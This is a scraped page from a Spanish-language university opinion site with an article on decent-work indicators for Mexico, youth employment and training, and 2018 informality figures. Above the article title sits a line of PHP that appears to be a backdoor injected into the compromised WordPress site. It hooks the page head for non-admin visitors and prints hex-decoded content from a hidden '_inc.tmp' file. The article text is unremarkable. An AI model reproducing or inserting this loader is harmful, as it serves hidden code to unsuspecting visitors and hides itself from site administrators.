if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } EL MUNDO LABORAL DE LOS JÓVENES – La Opinión Universitaria La Opinión Universitaria
Menu

EL MUNDO LABORAL DE LOS JÓVENES

Como vimos anteriormente, hablando de trabajo decente y siguiendo los criterios desarrollados en la 18ª Conferencia Internacional de Estadísticos del Trabajo Decente en México, se establecieron indicadores para México, de acuerdo a los cuatro ejes estratégicos; las variables que integran cada eje son los que a continuación describiremos:

  1. Acceso al empleo. El primer eje agrupa variables que permiten valorar la composición del mercado laboral entre formal e informal (para la Organización Internacional del Trabajo, son formales sólo quienes tienen prestaciones laborales y acceso a la seguridad social), por nivel de ingresos de la población ocupada, por tiempo trabajado y aquellos que abiertamente buscan empleo; dentro de este eje se establecen un total de ocho indicadores.
  2. Seguridad en el empleo. En éste eje se agruparon aquellas variables que muestran las condiciones en los centros de trabajo, recurriendo a variables como son asegurados en el trabajo, accidentes y enfermedades de trabajo (tres indicadores).
  • Derechos laborales. En este eje se agrupan aquellas variables que muestran el cumplimiento de la ley federal del trabajo en términos de equidad de género, eliminación del trabajo infantil y formalización del trabajo (cinco indicadores); y
  1. Diálogo Social. Para conformar éste eje se seleccionaron indicadores que muestran el proceso de negociación obrero patronal, el cual se inicia cuando se da un emplazamiento a huelga, pasa a conciliación y en caso de que no se llegue a ningún acuerdo, se registra el estallamiento de huelga y/o culmina con la celebración de un contrato colectivo (cuatro indicadores).

La suma total de los indicadores de los ejes antes mencionados son veinte, con los cuales se diseñó un índice para cada eje, mismo que se aplicó a cada entidad federativa. Los indicadores por eje son los siguientes:

  1. Acceso al empleo: Tasa de Participación Laboral, Tasa de desocupación, Tasa de Presión General, Indicador de Insuficiencia de Ingresos, Tasa de Condiciones Críticas de Ocupación, Tasa de Subocupación, Tasa de Informalidad Laboral (TIL-1), Tasa de Trabajo Asalariado.
  2. Seguridad en el empleo: Porcentaje de Accidentes sobre el total de Asegurados, Porcentaje de Enfermedades de Trabajo sobre el total de asegurados, Porcentaje de asegurados permanentes sobre la población ocupada.
  3. Derechos laborales: Tasa de Participación Femenina, Trabajo infantil, Relación de desempleo por género, Población con contrato definido, Brecha salarial por género.
  4. Diálogo social: Emplazamientos a Huelgas, Huelgas, Conciliaciones, Convenios Colectivos. (Todos los indicadores se miden en porcentajes).[1]

Como lo hemos mencionado, la educación y la capacitación deben ser una constante en la vida de toda persona. Salvador González Mendiola, Secretario General del Sindicato Nacional de Trabajadores de la Industria de Camas y Productos de Metal, compartió su testimonió y habló de la educación y de lo importante que es que la gente se capacite, de que no caiga en el conformismo y que se requiere de preparación y esfuerzo para obtener un mejor empleo, un mejor salario y por lo tanto mayor oportunidad de tener acceso a un mejor nivel de vida. Señala González Mendiola, “Nada más es poner un poco de actitud, estamos en un país en donde la gente es trabajadora, solo hay que orientarlos y realmente se superan”[2] Afirma que no basta con lamentarse por la situación, es necesario unirnos en esmero y determinación, y así lograr resultados; recalca que es necesario que estemos mejor preparados, incluso en el conocimiento de nuestros derechos laborales (sueldos, horarios, prestaciones, etcétera).

El último trimestre del 2018 la tasa de informalidad de la población ocupada en México fue de 56.7%[3]. Lograr condiciones de trabajo decente no es solo responsabilidad de las instituciones y empresas sino también de los trabajadores y la disposición que tengan de prepararse y estar en constante capacitación.

 

 

IM&DS

[1] Situación del trabajo Decente en México. Boletín semestral, año I, núm. 1, Septiembre 2013. OIT

 

[2] Revista Mundo del Trabajo, año 13, núm. 136, 2018. Acceso a un mejor empleo y salario: la educación y capacitación, pág. 18, 19. Secretaría del Trabajo y Previsión Social

[3] INEGI. Encuesta Nacional de Ocupación y Empleo.

No comments

Deja una respuesta

Tweets recientes